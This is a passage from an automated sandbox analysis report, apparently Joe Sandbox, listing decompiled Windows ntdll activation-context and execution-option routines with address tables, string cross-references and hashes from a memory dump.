					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                            0x1d807560
                                                                            0x1d807562
                                                                            0x1d80756f
                                                                            0x1d807571
                                                                            0x1d8075ab
                                                                            0x1d8075b9
                                                                            0x1d8075b9
                                                                            0x1d807579
                                                                            0x1d807583
                                                                            0x1d80758f
                                                                            0x1d844443
                                                                            0x1d807595
                                                                            0x1d80759e
                                                                            0x1d80759e
                                                                            0x1d8075a2
                                                                            0x1d8075bc
                                                                            0x1d8075c2
                                                                            0x1d8075c7
                                                                            0x1d8075c9
                                                                            0x1d807621
                                                                            0x1d807623
                                                                            0x1d807624
                                                                            0x1d8075f8
                                                                            0x1d8075ff
                                                                            0x1d807601
                                                                            0x1d80762c
                                                                            0x1d807603
                                                                            0x1d807609
                                                                            0x1d807610
                                                                            0x1d807612
                                                                            0x1d807612
                                                                            0x1d807612
                                                                            0x1d807614
                                                                            0x1d807616
                                                                            0x1d807630
                                                                            0x1d807633
                                                                            0x1d807633
                                                                            0x1d807618
                                                                            0x1d80761a
                                                                            0x1d8445c9
                                                                            0x1d8445c9
                                                                            0x1d8445d1
                                                                            0x1d8445d2
                                                                            0x1d8445d4
                                                                            0x1d8445d6
                                                                            0x1d8445d6
                                                                            0x00000000
                                                                            0x1d80761a
                                                                            0x1d8075ce
                                                                            0x1d8075d4
                                                                            0x1d8075da
                                                                            0x1d8075df
                                                                            0x1d8075e1
                                                                            0x1d84444a
                                                                            0x1d844450
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d844456
                                                                            0x1d844469
                                                                            0x1d844476
                                                                            0x1d844486
                                                                            0x1d84448b
                                                                            0x1d844497
                                                                            0x1d8444b9
                                                                            0x1d8444bf
                                                                            0x1d8444c1
                                                                            0x1d8444c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8444c9
                                                                            0x1d8444cf
                                                                            0x1d8444d1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8444dc
                                                                            0x1d8444de
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8444e6
                                                                            0x1d8444ed
                                                                            0x1d8444ef
                                                                            0x1d8445c4
                                                                            0x00000000
                                                                            0x1d8445c4
                                                                            0x1d8444f7
                                                                            0x1d8444f8
                                                                            0x1d844510
                                                                            0x1d844515
                                                                            0x1d844524
                                                                            0x1d84452b
                                                                            0x1d84452c
                                                                            0x1d84452e
                                                                            0x1d844556
                                                                            0x1d844561
                                                                            0x1d844567
                                                                            0x1d844569
                                                                            0x1d84456c
                                                                            0x1d84456e
                                                                            0x1d844574
                                                                            0x1d844576
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d84457c
                                                                            0x1d84457c
                                                                            0x1d844584
                                                                            0x1d844588
                                                                            0x1d84458a
                                                                            0x1d84458c
                                                                            0x1d84458e
                                                                            0x1d84458e
                                                                            0x1d84459b
                                                                            0x1d8445a0
                                                                            0x1d8445a7
                                                                            0x1d8445ac
                                                                            0x1d8445ae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8445b4
                                                                            0x1d8445b4
                                                                            0x1d8445b7
                                                                            0x1d8445b7
                                                                            0x00000000
                                                                            0x1d8445bf
                                                                            0x1d844530
                                                                            0x1d844535
                                                                            0x1d844537
                                                                            0x1d844539
                                                                            0x00000000
                                                                            0x1d84453e
                                                                            0x1d8075e7
                                                                            0x1d8075e9
                                                                            0x1d8075ee
                                                                            0x1d8075f0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8075f2
                                                                            0x00000000
                                                                            0x1d8075a4
                                                                            0x1d8075a4
                                                                            0x1d8075a4
                                                                            0x00000000
                                                                            0x1d8075a4

                                                                            Strings
                                                                            • ExecuteOptions, xrefs: 1D8444AB
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1D84454D
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1D844460
                                                                            • Execute=1, xrefs: 1D84451E
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1D844507
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1D844530
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 1D844592
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: b76cff7cab569b822c1e198df8ac75536dcbad43b4ae81a0dddb8772c9fa098b
                                                                            • Instruction ID: 2ea069d3b2960e2236862f4a8d51e120dc2a24bbe76fb7e18f826c1f40358bd6
                                                                            • Opcode Fuzzy Hash: b76cff7cab569b822c1e198df8ac75536dcbad43b4ae81a0dddb8772c9fa098b
                                                                            • Instruction Fuzzy Hash: 0F514A35A0021DBADF11AE9CEC85FFD73A8EF08310F1145E9E605A7190DB70AA45CB53
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7EA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 48%
                                                                            			E1D7EA170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E1D7EA600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E1D7EA760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x1d8c91e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E1D7D4428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E1D7EA600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E1D85EF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E1D85EF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}


























































                                                                            0x1d7ea178
                                                                            0x1d7ea17f
                                                                            0x1d7ea182
                                                                            0x1d7ea18f
                                                                            0x1d7ea4b4
                                                                            0x00000000
                                                                            0x1d8377ce
                                                                            0x1d8377ce
                                                                            0x00000000
                                                                            0x1d8377ce
                                                                            0x1d7ea195
                                                                            0x1d7ea195
                                                                            0x1d7ea199
                                                                            0x1d7ea1a1
                                                                            0x1d7ea1a9
                                                                            0x1d7ea1b1
                                                                            0x1d8377f3
                                                                            0x1d8377f3
                                                                            0x00000000
                                                                            0x1d7ea1b7
                                                                            0x1d7ea1b7
                                                                            0x1d7ea1c0
                                                                            0x00000000
                                                                            0x1d7ea1c6
                                                                            0x1d7ea1c6
                                                                            0x1d7ea1cc
                                                                            0x1d7ea5dc
                                                                            0x00000000
                                                                            0x1d7ea5e2
                                                                            0x00000000
                                                                            0x1d7ea5e2
                                                                            0x1d7ea1d2
                                                                            0x1d7ea1d4
                                                                            0x00000000
                                                                            0x1d7ea1da
                                                                            0x1d7ea1da
                                                                            0x1d7ea1dd
                                                                            0x00000000
                                                                            0x1d7ea1e3
                                                                            0x1d7ea1e3
                                                                            0x1d7ea1e6
                                                                            0x1d7ea1fa
                                                                            0x1d7ea1fd
                                                                            0x1d7ea5f0
                                                                            0x00000000
                                                                            0x1d7ea5f6
                                                                            0x1d8377fd
                                                                            0x1d837802
                                                                            0x1d837807
                                                                            0x00000000
                                                                            0x1d837807
                                                                            0x1d7ea203
                                                                            0x1d7ea203
                                                                            0x1d7ea208
                                                                            0x1d7ea20b
                                                                            0x1d7ea20f
                                                                            0x1d7ea216
                                                                            0x1d7ea21c
                                                                            0x1d7ea224
                                                                            0x1d7ea228
                                                                            0x1d7ea22b
                                                                            0x1d7ea233
                                                                            0x1d7ea23b
                                                                            0x1d7ea23f
                                                                            0x1d7ea243
                                                                            0x1d7ea247
                                                                            0x1d7ea250
                                                                            0x1d7ea252
                                                                            0x1d7ea255
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ea25b
                                                                            0x1d7ea263
                                                                            0x1d7ea26f
                                                                            0x1d7ea26f
                                                                            0x1d7ea277
                                                                            0x1d7ea27d
                                                                            0x1d7ea3ae
                                                                            0x1d7ea3ae
                                                                            0x1d7ea3b4
                                                                            0x1d7ea3be
                                                                            0x1d837823
                                                                            0x1d837826
                                                                            0x00000000
                                                                            0x1d83782c
                                                                            0x1d83782c
                                                                            0x00000000
                                                                            0x1d83782c
                                                                            0x1d7ea3c4
                                                                            0x1d7ea3c4
                                                                            0x1d7ea3c9
                                                                            0x00000000
                                                                            0x1d7ea3c9
                                                                            0x1d7ea283
                                                                            0x1d7ea283
                                                                            0x1d7ea288
                                                                            0x00000000
                                                                            0x1d7ea288
                                                                            0x1d7ea265
                                                                            0x1d7ea265
                                                                            0x1d7ea269
                                                                            0x1d7ea4bf
                                                                            0x1d7ea4c2
                                                                            0x1d7ea4c8
                                                                            0x1d7ea4e3
                                                                            0x1d83780e
                                                                            0x00000000
                                                                            0x1d7ea4e9
                                                                            0x1d7ea4ec
                                                                            0x1d837819
                                                                            0x00000000
                                                                            0x1d7ea4f2
                                                                            0x1d7ea4f2
                                                                            0x00000000
                                                                            0x1d7ea4f2
                                                                            0x1d7ea4ec
                                                                            0x1d7ea4ca
                                                                            0x1d7ea4ca
                                                                            0x1d7ea4cc
                                                                            0x00000000
                                                                            0x1d7ea4d2
                                                                            0x1d7ea4d2
                                                                            0x1d7ea4d2
                                                                            0x1d7ea4d7
                                                                            0x1d7ea28c
                                                                            0x1d7ea28e
                                                                            0x1d837833
                                                                            0x1d837838
                                                                            0x1d837838
                                                                            0x00000000
                                                                            0x1d7ea294
                                                                            0x1d7ea2a5
                                                                            0x1d7ea2ac
                                                                            0x1d7ea3d2
                                                                            0x1d7ea3d9
                                                                            0x00000000
                                                                            0x1d7ea3e8
                                                                            0x1d7ea3e8
                                                                            0x1d7ea3ec
                                                                            0x1d7ea3f0
                                                                            0x00000000
                                                                            0x1d7ea3f0
                                                                            0x1d7ea2b2
                                                                            0x1d7ea2b2
                                                                            0x1d7ea2d2
                                                                            0x1d7ea2d6
                                                                            0x1d7ea2d8
                                                                            0x1d7ea2da
                                                                            0x1d7ea2dc
                                                                            0x1d7ea2de
                                                                            0x1d83783a
                                                                            0x1d83783c
                                                                            0x00000000
                                                                            0x1d837842
                                                                            0x00000000
                                                                            0x1d837842
                                                                            0x1d7ea2e4
                                                                            0x1d7ea2e4
                                                                            0x1d7ea2e4
                                                                            0x1d7ea2eb
                                                                            0x1d8378ed
                                                                            0x1d8378ed
                                                                            0x00000000
                                                                            0x1d7ea2f1
                                                                            0x1d7ea2f1
                                                                            0x1d7ea300
                                                                            0x1d7ea300
                                                                            0x1d7ea300
                                                                            0x1d7ea30a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ea310
                                                                            0x1d7ea325
                                                                            0x1d7ea32c
                                                                            0x1d7ea4f7
                                                                            0x1d7ea500
                                                                            0x1d7ea502
                                                                            0x1d7ea505
                                                                            0x1d7ea50b
                                                                            0x1d7ea5a5
                                                                            0x1d7ea5b8
                                                                            0x1d7ea5be
                                                                            0x1d7ea5c2
                                                                            0x1d7ea5cb
                                                                            0x1d7ea5d1
                                                                            0x1d7ea5d1
                                                                            0x1d7ea5cb
                                                                            0x1d7ea50b
                                                                            0x1d7ea523
                                                                            0x1d7ea549
                                                                            0x1d7ea551
                                                                            0x1d7ea525
                                                                            0x1d7ea53c
                                                                            0x1d7ea543
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ea543
                                                                            0x1d7ea332
                                                                            0x1d7ea337
                                                                            0x1d7ea393
                                                                            0x1d7ea399
                                                                            0x1d7ea339
                                                                            0x1d7ea339
                                                                            0x1d7ea342
                                                                            0x1d7ea344
                                                                            0x1d7ea34a
                                                                            0x1d7ea34e
                                                                            0x1d7ea355
                                                                            0x1d7ea359
                                                                            0x00000000
                                                                            0x1d7ea360
                                                                            0x1d7ea363
                                                                            0x1d7ea3fa
                                                                            0x1d7ea3fc
                                                                            0x1d837847
                                                                            0x1d83784f
                                                                            0x00000000
                                                                            0x1d837855
                                                                            0x1d837855
                                                                            0x1d837859
                                                                            0x00000000
                                                                            0x1d83785f
                                                                            0x1d83785f
                                                                            0x1d837862
                                                                            0x1d837868
                                                                            0x1d837892
                                                                            0x1d837894
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83786a
                                                                            0x1d83786d
                                                                            0x1d83787e
                                                                            0x1d83788b
                                                                            0x00000000
                                                                            0x1d837880
                                                                            0x1d837880
                                                                            0x1d837885
                                                                            0x1d83789a
                                                                            0x1d83789a
                                                                            0x1d83789f
                                                                            0x00000000
                                                                            0x1d83789f
                                                                            0x1d83786f
                                                                            0x1d837873
                                                                            0x1d83788e
                                                                            0x1d83788e
                                                                            0x00000000
                                                                            0x1d83788e
                                                                            0x1d83786d
                                                                            0x1d837868
                                                                            0x1d837859
                                                                            0x1d7ea402
                                                                            0x1d7ea402
                                                                            0x1d7ea405
                                                                            0x1d7ea554
                                                                            0x1d7ea556
                                                                            0x1d7ea55e
                                                                            0x1d7ea564
                                                                            0x1d7ea56a
                                                                            0x00000000
                                                                            0x1d7ea570
                                                                            0x1d7ea570
                                                                            0x1d7ea575
                                                                            0x00000000
                                                                            0x1d7ea575
                                                                            0x1d7ea40b
                                                                            0x1d7ea40e
                                                                            0x00000000
                                                                            0x1d7ea414
                                                                            0x1d7ea414
                                                                            0x1d7ea418
                                                                            0x1d7ea420
                                                                            0x1d7ea426
                                                                            0x1d7ea42c
                                                                            0x00000000
                                                                            0x1d7ea432
                                                                            0x1d7ea432
                                                                            0x1d7ea437
                                                                            0x00000000
                                                                            0x1d7ea437
                                                                            0x1d7ea42c
                                                                            0x1d7ea40e
                                                                            0x1d7ea405
                                                                            0x1d7ea369
                                                                            0x1d7ea369
                                                                            0x1d7ea36c
                                                                            0x1d8378e3
                                                                            0x00000000
                                                                            0x1d7ea372
                                                                            0x1d7ea372
                                                                            0x1d7ea374
                                                                            0x1d7ea452
                                                                            0x1d7ea459
                                                                            0x1d7ea57e
                                                                            0x1d7ea585
                                                                            0x00000000
                                                                            0x1d7ea594
                                                                            0x1d7ea594
                                                                            0x1d7ea598
                                                                            0x00000000
                                                                            0x1d7ea598
                                                                            0x1d7ea45f
                                                                            0x1d7ea45f
                                                                            0x1d7ea47f
                                                                            0x1d7ea483
                                                                            0x1d7ea485
                                                                            0x1d7ea487
                                                                            0x1d7ea489
                                                                            0x1d7ea48b
                                                                            0x00000000
                                                                            0x1d7ea491
                                                                            0x1d7ea493
                                                                            0x1d8378a8
                                                                            0x1d8378b1
                                                                            0x1d8378c3
                                                                            0x1d8378c3
                                                                            0x1d8378cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8378d6
                                                                            0x1d8378dc
                                                                            0x00000000
                                                                            0x1d8378de
                                                                            0x00000000
                                                                            0x1d8378de
                                                                            0x00000000
                                                                            0x1d8378dc
                                                                            0x1d8378c3
                                                                            0x1d8378b1
                                                                            0x1d7ea499
                                                                            0x1d7ea499
                                                                            0x00000000
                                                                            0x1d7ea499
                                                                            0x1d7ea48b
                                                                            0x1d7ea37a
                                                                            0x1d7ea37a
                                                                            0x1d7ea37f
                                                                            0x1d7ea381
                                                                            0x1d7ea49b
                                                                            0x1d7ea49b
                                                                            0x1d7ea4a2
                                                                            0x00000000
                                                                            0x1d7ea4a8
                                                                            0x00000000
                                                                            0x1d7ea4a8
                                                                            0x1d7ea387
                                                                            0x1d7ea387
                                                                            0x1d7ea38c
                                                                            0x1d7ea38e
                                                                            0x1d7ea38e
                                                                            0x00000000
                                                                            0x1d7ea38c
                                                                            0x1d7ea381
                                                                            0x1d7ea374
                                                                            0x1d7ea36c
                                                                            0x00000000
                                                                            0x1d7ea363
                                                                            0x1d7ea360
                                                                            0x1d7ea337
                                                                            0x00000000
                                                                            0x1d7ea32c
                                                                            0x1d8378f1
                                                                            0x1d8378f1
                                                                            0x1d8378fc
                                                                            0x1d837904
                                                                            0x00000000
                                                                            0x1d837904
                                                                            0x1d7ea2eb
                                                                            0x1d7ea2de
                                                                            0x1d7ea2ac
                                                                            0x1d7ea28e
                                                                            0x1d7ea4cc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ea269
                                                                            0x00000000
                                                                            0x1d7ea39c
                                                                            0x1d7ea39c
                                                                            0x1d7ea39f
                                                                            0x00000000
                                                                            0x1d7ea3a5
                                                                            0x1d7ea3a8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ea3a8
                                                                            0x00000000
                                                                            0x1d7ea39f
                                                                            0x1d7ea250
                                                                            0x1d7ea1e8
                                                                            0x1d7ea1f1
                                                                            0x1d8377d8
                                                                            0x1d8377dd
                                                                            0x1d8377e2
                                                                            0x1d8377e7
                                                                            0x1d8377e7
                                                                            0x1d8377e9
                                                                            0x1d8377eb
                                                                            0x00000000
                                                                            0x1d7ea1f7
                                                                            0x1d7ea1f7
                                                                            0x00000000
                                                                            0x1d7ea1f7
                                                                            0x1d7ea1f1
                                                                            0x1d7ea1e6
                                                                            0x1d7ea1dd
                                                                            0x1d7ea1d4
                                                                            0x1d7ea1cc
                                                                            0x1d7ea1c0
                                                                            0x1d7ea1b1
                                                                            0x00000000

                                                                            Strings
                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8377E2
                                                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1D8378F3
                                                                            • SsHd, xrefs: 1D7EA304
                                                                            • Actx , xrefs: 1D837819, 1D837880
                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D8377DD, 1D837802
                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D837807
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
